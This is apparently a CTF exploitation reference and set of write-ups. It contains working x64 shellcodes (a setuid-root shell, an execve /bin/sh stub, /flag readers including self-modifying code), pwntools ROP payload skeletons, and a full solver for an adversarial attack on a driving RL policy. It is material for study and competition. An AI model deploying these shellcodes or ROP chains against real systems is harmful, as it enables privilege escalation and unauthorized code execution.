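def endbr64_offsets(code: bytes) -> List[int]:
    """Offsets in `code` where the endbr64 byte sequence begins."""
    hits: List[int] = []
    start = 0
    while (index := code.find(ENDBR64, start)) != -1:
        hits.append(index)
        start = index + 1
    return hits


# Hypothetical .text bytes: endbr64; push rbp; nop; nop; nop; endbr64
sample = ENDBR64 + b"\x55" + b"\x90" * 3 + ENDBR64
print(endbr64_offsets(sample))  # [0, 8]
```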

When SHSTK blocks ROP, look for:

  • Non-return indirect branches: jmp rax, call rax, switch-table dispatch.
  • notrack jumps in compiler-generated switch code.
  • Writable function pointers, vtables, callback tables, jump-table indexes.
  • Logic bugs that reach win without hijacking ret.

Reference Shellcodes

x64 root shell (No REX.W/0x48)

# Avoids \x48 (REX.W prefix)
.global _start
_start:
.intel_syntax noprefix

/* 0. Set UID to root (setuid(0)) */
xor edi, edi /* rdi = 0 (root UID) -> 31 ff */
push 105 /* syscall 105 (0x69) = setuid */
pop rax /* 6a 69 58 */
syscall

/* 1. Prepare null bytes and allocate stack space */
xor esi, esi
push rsi /* 8-byte null terminator */
push rsi /* space for /bin//sh */
push rsp
pop rdi /* push rsp (0x54) + pop rdi (0x5f) avoids mov rdi, rsp (0x48) */

/* 2. Construct /bin//sh on the stack (using 32-bit ops to avoid REX.W) */
/* 0x6e69622f = "nib/", 0x68732f2f = "hs//" (little-endian) */
mov dword ptr [rdi], 0x6e69622f
mov dword ptr [rdi+4], 0x68732f2f

/* 3. Set execve syscall number */
push 59
pop rax /* avoids mov rax, 59 */

/* 4. Clear edx (envp) and execute */
xor edx, edx
syscall

x64 execve("/bin/sh") (22-23 bytes)

; Standard 22-23 byte execve("/bin/sh")

; BITS 64

xor rsi, rsi ; Clear RSI (argv = NULL)
push rsi ; Push NULL terminator for string
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rbx ; Push string to stack
push rsp ; Push address of string
pop rdi ; RDI = address of "/bin//sh" (filename)
mov al, 0x3b ; AL = 59 (execve); assumes the rest of RAX is already 0, else use push 0x3b; pop rax (+1 byte)
cdq ; RDX = 0 (envp = NULL) because EAX is non-negative
syscall ; Execute
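To double-check the size and the absence of null bytes, the instruction encodings of the listing above are written out by hand below. Confirm them with an assembler, for example objdump -d on the compiled stub:

```python
# (instruction, hex encoding) for the 22-byte execve("/bin//sh") listing
LISTING = [
    ("xor rsi, rsi", "4831f6"),
    ("push rsi", "56"),
    ("mov rbx, 0x68732f2f6e69622f", "48bb2f62696e2f2f7368"),
    ("push rbx", "53"),
    ("push rsp", "54"),
    ("pop rdi", "5f"),
    ("mov al, 0x3b", "b03b"),
    ("cdq", "99"),
    ("syscall", "0f05"),
]

code = b"".join(bytes.fromhex(encoding) for _, encoding in LISTING)
print(len(code), b"\x00" in code)  # 22 False
print(code[6:14])                  # b'/bin//sh' (the imm64 operand)
```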

x64 cat /flag

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
/* call open('rsp', 'O_RDONLY', 'rdx') */
push 2
pop rax
mov rdi, rsp
xor esi, esi /* O_RDONLY */
syscall
/* call sendfile(1, 'rax', 0, 0x7fffffff) */
mov r10d, 0x7fffffff
mov rsi, rax
push 40 /* 0x28 */
pop rax
push 1
pop rdi
cdq /* rdx=0 */
syscall

x64 cat /flag (No REX.W/0x48)

.global _start
_start:
.intel_syntax noprefix

/* 1. OPEN: open("/flag", O_RDONLY) -> Syscall 2 */
xor esi, esi /* rsi = 0 (O_RDONLY) -> 31 f6 */
push rsi /* null terminator */
push rsp
pop rdi /* rdi points to stack top (avoids mov rdi, rsp) */

/* Construct "/flag" using 32-bit and 8-bit writes */
/* "/fla" = 0x616c662f */
mov dword ptr [rdi], 0x616c662f /* c7 07 2f 66 6c 61 */
/* "g" = 0x67 */
mov byte ptr [rdi+4], 0x67 /* c6 47 04 67 */

push 2
pop rax /* open syscall number */
syscall /* fd returned in rax */

/* 2. READ: read(fd, buffer, size) -> Syscall 0 */
xchg eax, edi /* rdi = fd; eax receives the old edi (not zero, reset below) (0x97) */

push rsp
pop rsi /* rsi = rsp (buffer) */

push 100
pop rdx /* rdx = 100 (size); mov dl alone would keep RDX's stale upper bits */
xor eax, eax /* read syscall number */
syscall

/* 3. WRITE: write(stdout, buffer, size) -> Syscall 1 */
xchg eax, edx /* rdx = bytes read (0x92) */

push 1
pop rdi /* rdi = 1 (stdout) */

push 1
pop rax /* write syscall number */
syscall

x64 cat /flag (No 'syscall' opcode)

.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
/* call open('rsp', 'O_RDONLY', 'rdx') */
push 2
pop rax
mov rdi, rsp
xor esi, esi
inc byte ptr [rip + patch_target1 + 1]
patch_target1:
.byte 0x0f
.byte 0x04 /* Patched to 0x0f05 at runtime */
/* call sendfile(1, 'rax', 0, 0x7fffffff) */
mov r10d, 0x7fffffff
mov rsi, rax
push 40
pop rax
push 1
pop rdi
cdq
inc byte ptr [rip + patch_target2 + 1]
patch_target2:
.byte 0x0f
.byte 0x04

Common Terms

| Term | Description |
|------|-------------|
| ROP | Return-Oriented Programming. Chaining "gadgets" ending in ret. |
| JOP/COP | Jump/Call-Oriented Programming. Chains indirect jmp/call dispatch instead of ret. |
| ret2win | Overwrite control flow to a hidden/success function in the binary. |
| ret2libc | Redirecting execution to a libc function instead of shellcode. |
| ret2plt | Calling a PLT stub in the binary, often to leak or invoke imported functions. |
| ret2csu | Using __libc_csu_init gadgets to set up multi-register function calls. |
| SROP | Sigreturn-Oriented Programming. Fake a signal frame to control registers. |
| PLT/GOT | Procedure Linkage Table & Global Offset Table. Used for resolving external library function addresses. |
| OOB | Out-of-bounds. Accessing memory outside the intended range of an array or buffer. |
| UAF | Use-after-free. Reusing a pointer after its backing allocation has been freed. |
| SMC | Self-modifying code. Code patches its own bytes at runtime. |
| CET | Intel Control-flow Enforcement Technology: mainly SHSTK and IBT. |
| endbr64 | Valid landing instruction required by IBT for indirect branch targets. |

Exploit Skeletons

Local/Remote Toggle

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./chall", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([elf.path] + argv, gdbscript="""
            set disassembly-flavor intel
            break *main
            continue
        """, *a, **kw)
    if args.REMOTE:
        return remote("host", 1337)
    return process([elf.path] + argv, *a, **kw)

io = start(env={})

Run with:

python solve.py
python solve.py GDB
python solve.py REMOTE

Leak Parsing

io.recvuntil(b"leak: ")
leak = int(io.recvline().strip(), 16)

raw = io.recvn(6)
addr = u64(raw.ljust(8, b"\x00"))
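puts() stops at the first null byte, so a 64-bit address usually arrives as 6 bytes. The sketch below does the same parsing and adds a plausibility check. The prefix test is a heuristic for amd64 Linux, not a rule: libc and stack addresses typically start with 0x7f, and PIE addresses with 0x55 or 0x56:

```python
def parse_leak(raw: bytes, expect_prefix: int = 0x7F) -> int:
    """u64(raw.ljust(8, b"\\x00")) plus a check on the top byte of a 48-bit address."""
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    addr = int.from_bytes(raw.ljust(8, b"\x00"), "little")
    if addr >> 40 != expect_prefix:
        raise ValueError(f"suspicious leak {addr:#x}")
    return addr


print(hex(parse_leak(bytes.fromhex("500e881c3a7f"))))  # 0x7f3a1c880e50
```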

Flat Payloads

payload = flat(
b"A" * offset,
canary,
b"B" * 8,
pop_rdi,
next(libc.search(b"/bin/sh\x00")),
libc.sym["system"],
)

Python: Integer to Byte Conversion

In Python, converting an integer (0-255) to a byte string requires careful handling of the bytes() constructor:

  • Incorrect: bytes(guess)
    • If guess = 5, this creates a null-filled byte string of length 5: b'\x00\x00\x00\x00\x00'.
  • Correct: bytes([guess])
    • Passing a list (iterable) treats the integer as the actual byte value.
    • If guess = 65, bytes([65]) results in b'A' (0x41).

movaps

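movaps (Move Aligned Packed Single-Precision Floating-Point Values) is an x86/x64 SIMD (single instruction, multiple data) instruction used mainly for efficient data movement.

  • SIMD vectorization and throughput: to process data efficiently, modern CPUs run vector operations on XMM registers. movaps moves 128 bits (16 bytes) in a single instruction, which makes good use of memory bandwidth. It is common in audio/video codecs, graphics rendering, cryptography, and other data-parallel workloads.
  • Memory alignment and cache lines: movaps requires its memory operand to be 16-byte aligned (the address must be a multiple of 16); an unaligned address raises a general-protection fault (#GP). Modern CPUs typically use 64-byte L1 data cache lines, and a 16-byte-aligned 16-byte block can never straddle two cache lines, so the access touches a single line and avoids the penalty of a split load or store.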

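Stack Alignment in x64 ROP Chains

In 64-bit Linux pwn (exploitation), calling libc functions such as system() or printf() from a ROP chain often crashes. The root cause is a violation of the calling convention's stack-alignment rule.

  • System V AMD64 ABI alignment rule: immediately before a call instruction, rsp % 16 == 0. call pushes an 8-byte return address, so at the callee's first instruction rsp % 16 == 8. A standard prologue's push rbp then restores rsp % 16 == 0.
  • Why it faults: when an attacker hijacks control flow with a buffer overflow and jumps straight to system("/bin/sh") from a ROP chain, the state of rsp is easy to overlook. If rsp is off by 8 bytes, execution eventually reaches glibc internals (such as do_system or vfprintf) whose optimized code uses movaps on stack-resident locals. movaps on a misaligned stack address raises a hardware general-protection fault (#GP), which the kernel delivers to the process as SIGSEGV.
  • Exploit fix: pad with a ret gadget. Insert a bare ret gadget (opcode 0xC3) in the ROP chain before the target function (e.g., system). ret behaves like pop rip: it consumes 8 bytes from the stack, which shifts rsp by 8 and restores 16-byte alignment, avoiding the movaps fault.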
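If the stack address of the overwritten return slot is known (from a leak or a debugger), you can check the parity rule before running the exploit. Here is a sketch with a hypothetical address and chain:

```python
def needs_ret_pad(target_slot: int) -> bool:
    """
    `ret` pops the target function's address from stack slot `target_slot`, so RSP is
    target_slot + 8 at the function's first instruction. The ABI expects RSP % 16 == 8
    there (as if `call` had just pushed a return address), so the slot itself must be
    16-byte aligned; if it is not, one extra `ret` gadget before it fixes the parity.
    """
    return target_slot % 16 != 0


# Hypothetical chain: saved RIP slot at 0x7ffe3a2c1e38, chain = [pop_rdi, binsh, system]
saved_rip_slot = 0x7FFE3A2C1E38
system_slot = saved_rip_slot + 2 * 8
print(needs_ret_pad(system_slot))      # True
print(needs_ret_pad(system_slot + 8))  # False: one ret gadget shifts system by one slot
```

Without a known stack address, trying the chain both with and without the extra ret is usually the quickest fix.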

Quick fix:

ret = rop.find_gadget(["ret"])[0]
payload = flat(b"A" * offset, ret, pop_rdi, binsh, system)

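32-bit (x86) Alignment

In 32-bit exploitation, crashes caused by movaps are much less common, for the following architectural and compiler reasons:

  • Calling convention: 32-bit conventions such as cdecl pass arguments on the stack, and every push moves esp by 4 bytes. These frequent 4-byte shifts make 16-byte alignment much harder to maintain across a whole call chain.
  • Compiler instruction selection: because keeping the stack aligned costs more on 32-bit, compilers (especially older GCC) often fall back to the more tolerant movups (Move Unaligned, which accepts unaligned addresses), or skip SSE vectorization entirely and use scalar instructions for ordinary C code.
  • Realigning on 32-bit: if a 16-byte alignment crash does need fixing, you cannot simply drop in a single ret as on 64-bit. Work out how far the current esp is from the required alignment (a multiple of 4), then insert the matching number of pop <reg>; ret gadgets (for example pop eax; ret) until esp % 16 == 0 holds.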

roobet recently introduced their new game: rush hour. the objective of the game is to successfully bet on how many cars cross an arbitrary section of road in a given time. i have identified a highway exit on a california traffic cam that experts predict will have no traffic during this ctf. however, you somewhat unwisely bet that one car would take this exit. well, now's your chance. can you hack the autonomous car RL policy to drive to the target?

Challenge Overview

We are given a local challenge bundle containing a fixed reinforcement-learning driving policy and a remote service at rush-hour.challs.umdctf.io. The service accepts a small neural network that we control, which perturbs the observation vector seen by the fixed policy. The goal is to make the autonomous car drive into a hidden CTF target instead of the legitimate goal.

The twist: the local simulator uses a different physics timestep than the remote environment. An attack that works locally at one timestep may fail entirely at another.

Given Files

The challenge directory contains:

  • policy.py -- the fixed driving policy
  • attack.py -- the attacker network definition
  • game.py -- the environment/game loop
  • observations.py -- observation generation
  • physics.py -- car dynamics
  • weights.npz -- the fixed policy weights

We do not control the main driving policy. We only control a small attack network that adds a bounded perturbation to the policy's 8-dimensional observation.

Reverse Engineering

The Real Target

From game.py:

LEGIT_GOAL = (-20.0, -20.0)
CTF_GOAL = (18.5, -24.5)
CTF_RADIUS = 2.0
EPISODE_TIMEOUT = 60.0

The environment computes observations using LEGIT_GOAL, but the flag is awarded if the car reaches CTF_GOAL. The whole challenge is an adversarial-control problem: make the policy think it should do something slightly different at every timestep until it reaches the hidden target.

The Attacker Model

From attack.py, the network constraints are:

  • Input dimension: 8
  • Hidden dimension: 16
  • Output dimension: 8
  • Per-weight absolute value bound: 10.0
  • Output L2 norm bound after forward pass: 0.5

The submitted .npz must contain:

  • W0 shape (16, 8)
  • b0 shape (16,)
  • W1 shape (8, 16)
  • b1 shape (8,)
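A pre-submission check that mirrors the constraints listed above is sketched below. The server's own validation may differ, for example in dtype handling. The 0.5 output-norm bound is enforced by clipping in the forward pass, not by the file, so it is not checked here:

```python
from typing import Dict, List

import numpy as np

EXPECTED_SHAPES = {"W0": (16, 8), "b0": (16,), "W1": (8, 16), "b1": (8,)}
MAX_ABS_WEIGHT = 10.0


def validate_attack(arrays: Dict[str, np.ndarray]) -> List[str]:
    """Problems found in an attack parameter dict; an empty list means it looks valid."""
    problems: List[str] = []
    for name, shape in EXPECTED_SHAPES.items():
        if name not in arrays:
            problems.append(f"missing {name}")
            continue
        value = np.asarray(arrays[name], dtype=np.float64)
        if value.shape != shape:
            problems.append(f"{name}: shape {value.shape}, expected {shape}")
        if not np.all(np.isfinite(value)):
            problems.append(f"{name}: contains NaN or inf")
        elif value.size and np.abs(value).max() > MAX_ABS_WEIGHT:
            problems.append(f"{name}: max |w| above {MAX_ABS_WEIGHT}")
    return problems


zeros = {name: np.zeros(shape, dtype=np.float32) for name, shape in EXPECTED_SHAPES.items()}
print(validate_attack(zeros))  # []
```

To check a saved file, load it with np.load(path) and pass {key: data[key] for key in data.files}.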

The forward pass is simple:

h = np.tanh(W0 @ obs + b0)
y = np.tanh(W1 @ h + b1)
norm = float(np.linalg.norm(y))
if norm > MAX_DELTA_L2:
    y = y * (MAX_DELTA_L2 / norm)
return y

The perturbation is then added to the observation before the fixed policy runs.

Policy Inputs

From observations.py, the policy sees an 8-dimensional vector:

  • Normalized speed
  • Normalized steer angle
  • Heading cosine/sine
  • Goal-forward and goal-right coordinates in the car frame
  • Log-distance-to-goal
  • Constant bias term

This means the attack must be state-dependent -- a fixed offset would not work because the policy's inputs change as the car moves.

Initial Solve Strategy

The most direct approach: optimize the attack network weights directly against the provided simulator. This is the right starting point because:

  • The remote service accepts exactly this network format
  • The bundle includes the full local environment and fixed policy
  • The attack is small enough to search directly (280 parameters)
  • The simulator is deterministic (same seed = same result)

I built a local solver (solver.py) that:

  1. Simulates episodes from reset
  2. Evaluates attack candidates using the local environment
  3. Scores candidates by:
    • Huge reward for reaching the CTF goal
    • Otherwise minimizing distance to the CTF goal
  4. Uses an evolution-style search over attack weights

Solver Architecture

The solver uses a simple evolution strategy. The core idea: maintain a "center" set of weights in 280-dimensional space, sample random variations around it, run each variant through the simulator, pick the best ones, and move the center toward them.
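Below is the same mean-of-elites update, reduced to a toy objective so it runs without the challenge files. The 5-D target and all hyperparameters are illustrative, not the solver's:

```python
import numpy as np


def evolve(score, dim, iterations=100, population=32, elite_count=8, noise_scale=0.3, seed=0):
    """Mean-of-elites evolution strategy with the same update shape as run_search()."""
    rng = np.random.default_rng(seed)
    center = np.zeros(dim)
    best_x, best_score = center.copy(), score(center)
    for _ in range(iterations):
        samples = center + rng.normal(0.0, noise_scale, size=(population, dim))
        scores = np.array([score(x) for x in samples])
        order = np.argsort(scores)[::-1]  # best first
        if scores[order[0]] > best_score:
            best_score, best_x = scores[order[0]], samples[order[0]].copy()
        center = samples[order[:elite_count]].mean(axis=0)  # move to the elite mean
    return center, best_x, best_score


# Toy objective standing in for "negative distance to CTF_GOAL".
target = np.array([1.0, -2.0, 0.5, 3.0, -1.0])
center, best_x, best_score = evolve(lambda x: -float(np.linalg.norm(x - target)), dim=5)
print(np.round(center, 2), round(float(best_score), 3))
```

Like the solver, it keeps the best sample ever seen separately from the moving center, because the center itself can drift around the optimum with the sampling noise.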

The complete script is listed in the Full Solver Code section below.

Local Success

Running at dt=0.1 (the default at that point; the final listing below defaults to 0.02), the search converged quickly:

SearchConfig(seed=7, iterations=600, population=96, dt=0.1)

The winning artifact looked great locally:

{
'goal_reached': True,
'timed_out': False,
'steps': 90,
'final_distance': 1.913,
'final_position': (17.04, -23.26),
'inside_goal_radius': True
}

At this point, it looked solved.

Why the First Solve Failed Remotely

Uploading the local-winning artifact to the remote service produced:

episode timed out

This was the key twist in the challenge. The remote behavior clearly diverged from local, even though both appeared to represent the same game.

Root Cause Investigation

Instead of guessing, I connected directly to the websocket endpoint used by the frontend:

wss://rush-hour.challs.umdctf.io/ws

The frontend JavaScript bundle showed that the page renders state messages including x, z, heading, speed, obs, obsDelta, goalReached, timedOut, and flag. This allowed me to stream live state from the remote server.

What the Remote Stream Showed

The remote server was sending state updates at a much finer time cadence:

{"t": 0.01986314600071637, ...}
{"t": 0.04219807200570358, ...}
{"t": 0.06386602800193941, ...}

So the remote simulator steps at approximately:

dt ~= 0.02
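The step size can be estimated from the streamed t values. This sketch assumes t counts simulated seconds from the start of the episode. With only three samples the estimate is rough:

```python
from statistics import median
from typing import Sequence


def estimate_dt(timestamps: Sequence[float], start: float = 0.0) -> float:
    """Median gap between consecutive state timestamps (robust to a single odd gap)."""
    points = [start, *timestamps]
    gaps = [later - earlier for earlier, later in zip(points, points[1:])]
    return median(gaps)


ts = [0.01986314600071637, 0.04219807200570358, 0.06386602800193941]
print(f"{estimate_dt(ts):.4f}")
```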

My original local solver was optimized at:

dt = 0.1

That difference turned out to be fatal.

Local Confirmation

I replayed the same "winning" artifact locally under multiple timesteps:

dt = 0.1          -> goal_reached = True
dt = 0.05 -> goal_reached = True
dt = 0.02 -> goal_reached = False, timed_out = True
dt = 0.019863146 -> goal_reached = False, timed_out = True

The artifact was not robust. It only won under a coarse fixed-step local simulation. The finer timestep changes the car's trajectory enough that the attack perturbations no longer steer toward the CTF goal.

This explained the remote timeout perfectly.

The Real Exploit

The real solve was:

  1. Use the provided local simulator to understand the control surface
  2. Discover that the remote environment runs at a different timestep (dt ~ 0.02)
  3. Retune the search against the remote-like cadence
  4. Submit the new artifact
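One variation on step 3 (not what was done here, where the search simply switched dt) is to score each candidate by its worst result across several timesteps, so a winner cannot depend on one exact step size. Here is a sketch with a generic evaluate callback and toy stand-ins:

```python
from typing import Any, Callable, Dict, Iterable

Result = Dict[str, Any]


def robust_score(
    evaluate: Callable[[float], Result],
    score: Callable[[Result], float],
    dts: Iterable[float] = (0.1, 0.05, 0.02, 0.019863146),
) -> float:
    """Worst-case score of one candidate over several simulation timesteps."""
    return min(score(evaluate(dt)) for dt in dts)


# Toy stand-ins: this "candidate" only reaches the goal when dt >= 0.05.
def fake_evaluate(dt: float) -> Result:
    return {"goal_reached": dt >= 0.05, "steps": 100, "min_distance": 3.0}


def fake_score(result: Result) -> float:
    if result["goal_reached"]:
        return 1_000_000.0 - result["steps"]
    return -1000.0 * result["min_distance"]


print(robust_score(fake_evaluate, fake_score))  # -3000.0
```

In the solver, this would replace the single evaluate_attack call with robust_score(lambda dt: evaluate_attack(arrays, dt=dt), score_result). The trade-off is one simulation per timestep for every candidate.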

I re-ran the search with the corrected timestep:

SearchConfig(
    seed=99,
    iterations=120,
    population=48,
    elite_count=8,
    noise_scale=0.28,
    dt=0.02,
    max_time=60.0,
)

I tested several seeds and saved multiple candidates:

  • remote_seed1.npz
  • remote_seed7.npz
  • remote_seed42.npz
  • remote_seed99.npz

All of them reached the CTF goal locally under the finer timestep.

Verification

I verified each candidate at both dt=0.02 and the exact remote cadence dt=0.019863146:

import numpy as np
from solver import evaluate_attack

for seed in [1, 7, 42, 99]:
    with np.load(f"artifacts/remote_seed{seed}.npz") as data:
        arrays = {key: data[key] for key in data.files}
    for dt in [0.02, 0.019863146]:
        result = evaluate_attack(arrays, dt=dt)
        print(f"seed={seed} dt={dt} -> goal={result['goal_reached']}")

All four seeds succeeded at both timesteps.

Final Remote Submission

Submitting remote_seed99.npz to the websocket and waiting for server-side state updates eventually produced:

{
"goalReached": true,
"timedOut": false,
"flag": "UMDCTF{********************************************************************}"
}

The relevant terminal output near the end:

state 400 {'t': 8.4639, 'x': 16.118, 'z': -25.057, 'goalReached': False, 'flag': None}
state 405 {'t': 8.5656, 'x': 16.681, 'z': -25.055, 'goalReached': True,
'flag': 'UMDCTF{********************************************************************}'}

Full Solver Code

The complete solver script:

from __future__ import annotations

import math
from argparse import ArgumentParser
from dataclasses import dataclass
from pathlib import Path
from typing import Any

import numpy as np

from attack import AttackModel
from game import CTF_GOAL, CTF_RADIUS, EPISODE_TIMEOUT, GameState
from policy import load_default_policy

MAX_WEIGHT = 10.0
PROJECT_DIR = Path(__file__).resolve().parent
ATTACK_SHAPES = {
    "W0": (16, 8),
    "b0": (16,),
    "W1": (8, 16),
    "b1": (8,),
}
ATTACK_PARAMETER_SIZE = 16 * 8 + 16 + 8 * 16 + 8


@dataclass(frozen=True)
class SearchConfig:
    seed: int = 7
    iterations: int = 600
    population: int = 96
    elite_count: int = 12
    noise_scale: float = 0.28
    dt: float = 0.02  # remote env steps at ~0.02; 0.1 passes locally but times out remotely
    max_time: float = EPISODE_TIMEOUT


def default_attack_arrays() -> dict[str, np.ndarray]:
    return {
        "W0": np.zeros((16, 8), dtype=np.float32),
        "b0": np.zeros((16,), dtype=np.float32),
        "W1": np.zeros((8, 16), dtype=np.float32),
        "b1": np.zeros((8,), dtype=np.float32),
    }


def flatten_attack_arrays(arrays: dict[str, np.ndarray]) -> np.ndarray:
    return np.concatenate(
        [
            arrays["W0"].astype(np.float32).ravel(),
            arrays["b0"].astype(np.float32).ravel(),
            arrays["W1"].astype(np.float32).ravel(),
            arrays["b1"].astype(np.float32).ravel(),
        ]
    )


def unflatten_attack_vector(vector: np.ndarray) -> dict[str, np.ndarray]:
    x = np.asarray(vector, dtype=np.float32)
    assert x.shape == (ATTACK_PARAMETER_SIZE,)
    i = 0
    w0 = x[i : i + 128].reshape(16, 8)
    i += 128
    b0 = x[i : i + 16]
    i += 16
    w1 = x[i : i + 128].reshape(8, 16)
    i += 128
    b1 = x[i : i + 8]
    return {"W0": w0.copy(), "b0": b0.copy(), "W1": w1.copy(), "b1": b1.copy()}


def clamp_attack_arrays(arrays: dict[str, np.ndarray]) -> dict[str, np.ndarray]:
    return {
        key: np.clip(value, -MAX_WEIGHT, MAX_WEIGHT).astype(np.float32)
        for key, value in arrays.items()
    }


def save_attack_npz(path: str | Path, arrays: dict[str, np.ndarray]) -> None:
    safe_arrays = clamp_attack_arrays(arrays)
    target = Path(path)
    target.parent.mkdir(parents=True, exist_ok=True)
    np.savez(target, **safe_arrays)


def parse_args(argv: list[str] | None = None) -> tuple[SearchConfig, Path]:
    parser = ArgumentParser(description="Search for a rush-hour attack candidate.")
    parser.add_argument("--iterations", type=int, default=SearchConfig.iterations)
    parser.add_argument("--dt", type=float, default=SearchConfig.dt,
                        help="Simulation timestep (default: %(default)s). "
                             "Remote env uses ~0.02; 0.1 passes locally but times out remotely.")
    parser.add_argument(
        "--output",
        type=Path,
        default=PROJECT_DIR / "artifacts" / "best_attack.npz",
    )
    args = parser.parse_args(argv)
    return SearchConfig(
        iterations=args.iterations,
        dt=args.dt,
    ), args.output


def score_result(result: dict[str, Any]) -> float:
    if result["goal_reached"]:
        return 1_000_000.0 - float(result["steps"])
    return -1000.0 * float(result["min_distance"]) - float(result["final_distance"])


def evaluate_attack(
    arrays: dict[str, np.ndarray], dt: float = 0.02, max_time: float = EPISODE_TIMEOUT
) -> dict[str, Any]:
    state = GameState(load_default_policy())
    state.install_attack(AttackModel(arrays))

    initial_dx = state.car.x - CTF_GOAL[0]
    initial_dz = state.car.z - CTF_GOAL[1]
    min_distance = math.hypot(initial_dx, initial_dz)
    steps = 0
    truncated = False
    enforce_horizon = max_time < EPISODE_TIMEOUT
    while (
        not state.goal_reached
        and not state.timed_out
        and (not enforce_horizon or state.time + dt <= max_time)
    ):
        state.step(dt)
        dx = state.car.x - CTF_GOAL[0]
        dz = state.car.z - CTF_GOAL[1]
        min_distance = min(min_distance, math.hypot(dx, dz))
        steps += 1

    if (
        enforce_horizon
        and not state.goal_reached
        and not state.timed_out
        and state.time + dt > max_time
    ):
        truncated = True

    final_dx = state.car.x - CTF_GOAL[0]
    final_dz = state.car.z - CTF_GOAL[1]
    final_distance = math.hypot(final_dx, final_dz)

    return {
        "goal_reached": state.goal_reached,
        "timed_out": state.timed_out,
        "truncated": truncated,
        "steps": steps,
        "final_distance": final_distance,
        "min_distance": min_distance,
        "final_position": (state.car.x, state.car.z),
        "inside_goal_radius": final_distance < CTF_RADIUS,
    }


def run_search(config: SearchConfig) -> dict[str, Any]:
    rng = np.random.default_rng(config.seed)
    center = np.zeros(ATTACK_PARAMETER_SIZE, dtype=np.float32)
    best_vector = center.copy()
    best_result = evaluate_attack(
        unflatten_attack_vector(best_vector), dt=config.dt, max_time=config.max_time
    )
    best_score = score_result(best_result)

    for _ in range(config.iterations):
        population: list[tuple[float, np.ndarray, dict[str, Any]]] = []
        for _ in range(config.population):
            candidate = center + rng.normal(0.0, config.noise_scale, size=center.shape).astype(
                np.float32
            )
            arrays = clamp_attack_arrays(unflatten_attack_vector(candidate))
            vector = flatten_attack_arrays(arrays)
            result = evaluate_attack(arrays, dt=config.dt, max_time=config.max_time)
            score = score_result(result)
            population.append((score, vector, result))
            if score > best_score:
                best_score = score
                best_vector = vector.copy()
                best_result = result

        population.sort(key=lambda item: item[0], reverse=True)
        elite_vectors = [item[1] for item in population[: config.elite_count]]
        center = np.mean(np.stack(elite_vectors, axis=0), axis=0).astype(np.float32)

    best_arrays = clamp_attack_arrays(unflatten_attack_vector(best_vector))
    return {
        "best_score": float(best_score),
        "best_vector": best_vector,
        "best_arrays": best_arrays,
        "best_result": best_result,
    }


def main(argv: list[str] | None = None) -> int:
    config, output_path = parse_args(argv)
    result = run_search(config)
    save_attack_npz(output_path, result["best_arrays"])
    print(
        {
            "best_score": result["best_score"],
            "goal_reached": result["best_result"]["goal_reached"],
            "final_position": result["best_result"]["final_position"],
            "output_path": str(output_path),
        }
    )
    return 0


if __name__ == "__main__":
    raise SystemExit(main())

Flag

UMDCTF{now_you_know_how_to_drive_an_autonomous_vehicle_now_go_win_on_roobet}

We trained two normalizing flow models on similar data distributions. Can you find an input that one model thinks is highly likely and the other thinks is not? Submit a perturbation around the reference window satisfying: L_inf <= 0.08, log q1(x) - log q0(x) >= 30, log q1(x) >= threshold, and log|det J_f1|(x) within a calibrated band.

Files provided: flow_0.pt, flow_1.pt, reference_window.npy, check_remote.py

Category: ML / Adversarial

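Prerequisites

This challenge sits at the intersection of normalizing flows and adversarial machine learning. The following concepts help:

| Concept | Description |
|---|---|
| Normalizing flow | Warps a Gaussian into a complex distribution through an invertible bijection, allowing exact log-likelihood computation |
| RealNVP | A stack of affine coupling layers; the log-determinant of the Jacobian reduces to a sum of the scale outputs |
| Change-of-variables formula | log q(x) = log π(f(x)) + log \|det J_f\| |
| Adversarial perturbation | An L∞ constraint bounds the maximum change of each pixel |
| Gradient attack (FGSM) | A single perturbation step along the sign of the loss gradient |
| Line search | Try several step sizes along the gradient direction and keep the best one |
| Gram-Schmidt orthogonalization | Orthogonalize gradient directions to avoid degenerate paths (hinted at by the flag) |

References: RealNVP paper arXiv:1605.08803; C&W attack arXiv:1608.04644.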

Initial Analysis

We are given two pretrained normalizing flow models (flow_0.pt and flow_1.pt) along with a reference input window (reference_window.npy). Normalizing flows are generative models that define a bijective mapping between a simple base distribution (usually a standard Gaussian) and a complex data distribution. They allow exact log-likelihood evaluation via the change-of-variables formula.

The challenge asks us to find a perturbation \(x_{\text{sub}} = x_{\text{ref}} + \delta\) (with \(\| \delta \|_\infty \le 0.08\)) such that:

  1. Margin: \(\log q_1(x_{\text{sub}}) - \log q_0(x_{\text{sub}}) \ge 30\)
  2. Threshold: \(\log q_1(x_{\text{sub}}) \ge \tau\) (some fixed threshold)
  3. Jacobian constraint: \(\log |\det J_{f_1}|(x_{\text{sub}})\) lies within a calibrated band
  4. Bounded perturbation: \(\| \delta \|_\infty \le 0.08\)
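The four conditions can be combined into a single acceptance test. This is a minimal sketch and not the contents of check_remote.py. The threshold `tau` and the Jacobian band `(det_lo, det_hi)` are hypothetical parameters, because the writeup does not give their values. The log-densities are assumed to be computed by the two flows beforehand.

```python
def passes_checks(x_ref, x_sub, log_q0, log_q1, log_det1,
                  tau, det_lo, det_hi, eps=0.08, min_margin=30.0):
    """Return True when a candidate satisfies all four constraints.

    x_ref and x_sub are flat sequences of pixel values. tau, det_lo and
    det_hi are hypothetical stand-ins for the checker's real settings.
    """
    linf = max(abs(a - b) for a, b in zip(x_sub, x_ref))
    return (
        log_q1 - log_q0 >= min_margin      # 1. margin
        and log_q1 >= tau                  # 2. threshold
        and det_lo <= log_det1 <= det_hi   # 3. Jacobian band
        and linf <= eps                    # 4. L_inf budget
    )
```

Fed the reference metrics reported below (log q0 = 925.99, log q1 = 924.09), this check fails on the margin whatever `tau` is.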

Both flows are implemented in PyTorch and are fully differentiable. The reference window is a 4D NumPy array of shape (1, 1, 64, 64): a single-channel 64x64 image patch with batch and channel dimensions.

Understanding the Models

We loaded both .pt files using torch.load() with weights_only=False and examined their architectures:

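import torch
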